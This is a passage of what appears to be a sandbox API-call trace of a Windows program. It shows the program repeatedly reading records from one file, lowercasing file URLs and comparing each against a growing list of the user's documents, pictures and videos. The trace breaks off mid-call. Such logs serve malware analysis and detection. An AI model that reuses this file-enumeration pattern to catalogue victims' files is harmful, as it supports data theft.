wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png") returned 0x58 [0085.739] SetFilePointer (in: hFile=0x9c, lDistanceToMove=25216, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6280 [0085.739] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.739] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.740] SetFilePointer (in: hFile=0x9c, lDistanceToMove=25216, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6280 [0085.740] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.740] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/l5KV.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf" [0085.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf") returned 52 [0085.740] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png") returned -1 [0085.740] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf") returned -1 [0085.740] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf") returned -1 [0085.740] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp") returned -1 [0085.740] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png") returned -1 [0085.740] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv") returned -1 [0085.740] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots") returned 1 [0085.740] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots") returned -1 [0085.740] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx") returned -1 [0085.740] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned -1 [0085.740] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned -1 [0085.740] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned -1 [0085.740] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned -1 [0085.740] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned -1 [0085.740] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned -1 [0085.740] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned -1 [0085.740] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned -1 [0085.740] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 1 [0085.740] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf") returned 0x33 [0085.740] SetFilePointer (in: hFile=0x9c, lDistanceToMove=25472, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6380 [0085.740] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.740] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.740] SetFilePointer (in: hFile=0x9c, lDistanceToMove=25472, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6380 [0085.740] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.740] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/S2p0EKc.xlsx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx" [0085.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx") returned 58 [0085.740] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf") returned 1 [0085.740] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png") returned -1 [0085.740] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf") returned 1 [0085.740] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf") returned 1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp") returned 1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png") returned -1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv") returned -1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots") returned 1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots") returned 1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx") returned 1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned -1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned 1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned 1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned -1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned -1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned 1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned -1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned 1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 1 [0085.741] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx") returned 0x39 [0085.741] SetFilePointer (in: hFile=0x9c, lDistanceToMove=25728, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6480 [0085.741] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.741] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.741] SetFilePointer (in: hFile=0x9c, lDistanceToMove=25728, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6480 [0085.741] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.741] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/_J5.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png" [0085.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png") returned 51 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx") returned -1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf") returned -1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png") returned -1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf") returned -1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf") returned -1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp") returned -1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png") returned -1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv") returned -1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots") returned 1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots") returned -1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx") returned -1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned -1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned -1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned -1 [0085.741] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned -1 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned -1 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned -1 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned -1 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned -1 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 1 [0085.742] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png") returned 0x32 [0085.742] SetFilePointer (in: hFile=0x9c, lDistanceToMove=25984, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6580 [0085.742] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.742] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.742] SetFilePointer (in: hFile=0x9c, lDistanceToMove=25984, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6580 [0085.742] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.742] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/7tLU060TeHFmaN8.jpg" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg" [0085.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg") returned 63 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png") returned -1 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx") returned -1 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf") returned -1 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png") returned -1 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf") returned -1 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf") returned -1 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp") returned -1 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png") returned -1 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv") returned -1 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots") returned 1 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots") returned -1 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx") returned -1 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned -1 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned -1 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned -1 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned -1 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned -1 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned -1 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned -1 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned -1 [0085.742] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 1 [0085.742] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg") returned 0x3e [0085.742] SetFilePointer (in: hFile=0x9c, lDistanceToMove=26240, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6680 [0085.742] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.743] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.743] SetFilePointer (in: hFile=0x9c, lDistanceToMove=26240, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6680 [0085.743] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.743] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/XCrdCV/lJ3nRaTt.jpg" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg" [0085.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg") returned 90 [0085.743] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg") returned 1 [0085.743] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png") returned 1 [0085.743] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx") returned 1 [0085.743] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf") returned 1 [0085.743] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png") returned -1 [0085.743] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf") returned 1 [0085.743] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf") returned 1 [0085.743] wcscmp 